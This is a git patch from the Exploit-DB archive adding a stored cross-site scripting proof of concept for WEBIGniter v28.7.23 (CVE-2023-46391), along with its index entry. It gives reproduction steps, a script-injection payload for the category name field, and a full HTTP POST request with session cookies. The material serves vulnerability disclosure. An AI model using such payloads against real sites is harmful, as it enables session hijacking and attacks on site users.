From 624b24bca9ed3065bba62a5c8ab02acfb47b71d0 Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Thu, 22 Feb 2024 00:16:28 +0000
Subject: [PATCH] DB: 2024-02-22

2 changes to exploits/shellcodes/ghdb

WEBIGniter v28.7.23 - Stored Cross Site Scripting (XSS)
---
 exploits/php/webapps/51807.txt | 41 ++++++++++++++++++++++++++++++++++
 files_exploits.csv             |  1 +
 2 files changed, 42 insertions(+)
 create mode 100644 exploits/php/webapps/51807.txt

diff --git a/exploits/php/webapps/51807.txt b/exploits/php/webapps/51807.txt
new file mode 100644
index 000000000..276862a01
--- /dev/null
+++ b/exploits/php/webapps/51807.txt
@@ -0,0 +1,41 @@
+# Exploit Title: WEBIGniter v28.7.23 Stored Cross Site Scripting (XSS)
+# Exploit Author: Sagar Banwa
+# Date: 19/10/2023
+# Vendor: https://webigniter.net/
+# Software: https://webigniter.net/demo
+# Reference: https://portswigger.net/web-security/cross-site-scripting
+# Tested on: Windows 10/Kali Linux
+# CVE : CVE-2023-46391
+
+
+Stored Cross-site scripting(XSS):
+Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.
+
+Steps-To-Reproduce:
+
+1. Login to the Account
+2. Go to the Categories.
+3. Now add catagory > Name section use payload : "><script>alert(1)</script> and choose layoutfile as cat.php
+
+
+Request
+
+POST /cms/categories/add HTTP/2
+Host: demo.webigniter.net
+Cookie: ci_session=iq8k2mjlp2dg4pqa42m3v3dn2d4lmtjb; hash=6ROmvkMoHKviB4zypWJXmjIv6vhTQlFw6bdHlRjX
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 94
+Origin: https://demo.webigniter.net
+Referer: https://demo.webigniter.net/cms/categories/add
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+Te: trailers
+
+name=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&slug=scriptalert1script&layout_file=cat.php
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 3cd043779..74b843699 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -32267,6 +32267,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 21269,exploits/php/webapps/21269.txt,"Webify eDownloads Cart - Arbitrary File Deletion",2012-09-12,JIKO,webapps,php,,2012-09-12,2012-09-12,0,OSVDB-85662,,,,,
 19574,exploits/php/webapps/19574.txt,"Webify Link Directory - SQL Injection",2012-07-04,"Daniel Godoy",webapps,php,,2012-07-04,2012-07-04,1,OSVDB-83688,,,,http://www.exploit-db.comWebifyLinkDirectory.zip,
 21271,exploits/php/webapps/21271.txt,"Webify Photo Gallery - Arbitrary File Deletion",2012-09-12,JIKO,webapps,php,,2012-09-12,2012-09-12,1,OSVDB-85662,,,,,
+51807,exploits/php/webapps/51807.txt,"WEBIGniter v28.7.23 - Stored Cross Site Scripting (XSS)",2024-02-21,"Sagar Banwa",webapps,php,,2024-02-21,2024-02-21,0,,,,,,
 51736,exploits/php/webapps/51736.txt,"WEBIGniter v28.7.23 File Upload - Remote Code Execution",2023-10-09,nu11secur1ty,webapps,php,,2023-10-09,2023-10-09,0,,,,,,
 51616,exploits/php/webapps/51616.txt,"Webile v1.0.1 - Multiple Cross Site Scripting",2023-07-20,Vulnerability-Lab,webapps,php,,2023-07-20,2023-07-20,0,,,,,,
 47199,exploits/php/webapps/47199.txt,"WebIncorp ERP - SQL injection",2019-08-01,n1x_,webapps,php,80,2019-08-01,2019-08-02,0,,"SQL Injection (SQLi)",,,,